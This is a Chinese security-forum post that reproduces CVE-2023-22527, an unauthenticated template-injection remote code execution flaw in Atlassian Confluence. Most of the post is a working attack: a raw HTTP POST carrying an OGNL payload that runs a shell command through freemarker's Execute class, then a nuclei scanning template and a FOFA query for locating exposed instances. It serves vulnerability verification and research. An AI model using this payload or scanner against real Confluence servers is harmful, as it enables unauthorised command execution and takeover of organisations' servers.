【漏洞复现】Atlassian Confluence RCE(CVE-2023-22527)

王维   ·   发表于 2024-01-25 19:26:42   ·   CTF&WP专版

产品简介

Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。

0x02 漏洞概述

Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。

0x04 漏洞复现

漏洞POC

  1. POST /template/aui/text-inline.vm HTTP/1.1
  2. Host: 192.168.0.70:8090
  3. Accept-Encoding: gzip, deflate, br
  4. Accept: */*
  5. Accept-Language: en-US;q=0.9,en;q=0.8
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
  7. Connection: close
  8. Content-Type: application/x-www-form-urlencoded
  9. label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

nuclei POC

  1. id: AtlassianConfluenceRCE-CVE-2023-22527
  2. info:
  3. name: CVE-2023-22527
  4. author: xxx
  5. severity: info
  6. description: description
  7. reference:
  8. - https://wiki.agora.ru/
  9. metadata:
  10. fofa-query: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
  11. tags: confluence
  12. requests:
  13. - raw:
  14. - "POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding:\
  15. \ gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent:\
  16. \ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like\
  17. \ Gecko) Chrome/119.0.6045.159 Safari/537.36\nConnection: close\nContent-Type:\
  18. \ application/x-www-form-urlencoded\nContent-Length: 288\n\nlabel=\\u0027%2b#request\\\
  19. u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\\
  20. u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new\
  21. \ freemarker.template.utility.Execute()).exec({\"id\"})) "
  22. matchers-condition: and
  23. matchers:
  24. - type: dsl
  25. dsl:
  26. - contains(all_headers,"X-Cmd-Response") && status_code==200

打赏我,让我更有动力~

1 条回复   |  直到 11个月前 | 509 次浏览

小瑟斯
发表于 11个月前

1

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.